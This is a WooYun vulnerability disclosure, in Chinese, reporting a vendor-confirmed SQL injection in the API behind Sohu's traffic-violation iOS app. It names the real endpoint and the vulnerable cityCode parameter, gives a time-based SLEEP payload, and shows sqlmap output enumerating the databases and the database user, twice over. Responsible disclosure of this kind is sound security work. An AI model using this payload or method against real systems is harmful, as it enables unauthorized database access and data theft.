搜狐违章查询IOS客户端某接口SQL注入 | wooyun-2015-0164091

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2015-0164091

漏洞标题：

搜狐违章查询IOS客户端某接口SQL注入

漏洞详情

披露状态：

2015-12-24：细节已通知厂商并且等待厂商处理中
2015-12-24：厂商已经确认，细节仅向厂商公开
2016-01-03：细节向核心白帽子及相关领域专家公开
2016-01-13：细节向普通白帽子公开
2016-01-23：细节向实习白帽子公开
2016-02-06：细节向公众公开

简要描述：

我不能再默默无闻下去了...
PS:这都不来分和奖励，我半夜三更岂不是白忙活了~

详细说明：

地址就不用给了，AppStore上面搜索就可以下载了
问题出在周边服务查询接口，如下图

在网页上访问

接口地址:http://open.dealer.auto.sohu.com/api/dealerForDbModelPage?modelId=4835&cityCode=510100&_=1450903117507&callback=Data.parse4S

注入参数#cityCode

Payload:cityCode=510100;(SELECT * FROM (SELECT(SLEEP(5)))bspd)

[04:49:00] [INFO] testing MySQL
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n]
[04:49:09] [INFO] confirming MySQL
[04:49:09] [WARNING] it is very important not to stress the network adapter duri
ng usage of time-based payloads to prevent potential errors
[04:49:19] [INFO] adjusting time delay to 1 second due to good response times
[04:49:19] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.0
[04:49:19] [INFO] fetching database names
[04:49:19] [INFO] fetching number of databases
[04:49:19] [INFO] retrieved: 4
[04:49:21] [INFO] retrieved: information_schema
[04:53:33] [INFO] retrieved: autodealer
[04:58:06] [INFO] retrieved: dealer
[05:00:19] [INFO] retrieved: tesy
available databases [4]:
[*] autodealer
[*] dealer
[*] information_schema
[*] tesy

[05:05:51] [INFO] testing MySQL
[05:05:51] [INFO] confirming MySQL
[05:05:51] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.0
[05:05:51] [INFO] fetching current user
[05:05:51] [WARNING] time-based comparison requires larger statistical model, pl
ease wait..............................
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n]
[05:05:59] [WARNING] it is very important not to stress the network adapter duri
ng usage of time-based payloads to prevent potential errors
a
[05:06:11] [INFO] adjusting time delay to 1 second due to good response times
utodeal
[05:08:48] [ERROR] invalid character detected. retrying..
[05:08:48] [WARNING] increasing time delay to 2 seconds
[05:08:57] [ERROR] invalid character detected. retrying..
[05:08:57] [WARNING] increasing time delay to 3 seconds
er@%
current user:    'autodealer@%'

漏洞证明：

地址就不用给了，AppStore上面搜索就可以下载了
问题出在周边服务查询接口，如下图

在网页上访问

接口地址:http://open.dealer.auto.sohu.com/api/dealerForDbModelPage?modelId=4835&cityCode=510100&_=1450903117507&callback=Data.parse4S

注入参数#cityCode

[04:49:00] [INFO] testing MySQL
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n]
[04:49:09] [INFO] confirming MySQL
[04:49:09] [WARNING] it is very important not to stress the network adapter duri
ng usage of time-based payloads to prevent potential errors
[04:49:19] [INFO] adjusting time delay to 1 second due to good response times
[04:49:19] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.0
[04:49:19] [INFO] fetching database names
[04:49:19] [INFO] fetching number of databases
[04:49:19] [INFO] retrieved: 4
[04:49:21] [INFO] retrieved: information_schema
[04:53:33] [INFO] retrieved: autodealer
[04:58:06] [INFO] retrieved: dealer
[05:00:19] [INFO] retrieved: tesy
available databases [4]:
[*] autodealer
[*] dealer
[*] information_schema
[*] tesy

[05:05:51] [INFO] testing MySQL
[05:05:51] [INFO] confirming MySQL
[05:05:51] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.0
[05:05:51] [INFO] fetching current user
[05:05:51] [WARNING] time-based comparison requires larger statistical model, pl
ease wait..............................
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n]
[05:05:59] [WARNING] it is very important not to stress the network adapter duri
ng usage of time-based payloads to prevent potential errors
a
[05:06:11] [INFO] adjusting time delay to 1 second due to good response times
utodeal
[05:08:48] [ERROR] invalid character detected. retrying..
[05:08:48] [WARNING] increasing time delay to 2 seconds
[05:08:57] [ERROR] invalid character detected. retrying..
[05:08:57] [WARNING] increasing time delay to 3 seconds
er@%
current user:    'autodealer@%'

修复方案：

过滤

版权声明：转载请注明来源 Aasron@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2015-12-24 10:05

厂商回复：

感谢你对搜狐安全的支持。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Aasron@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Aasron@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞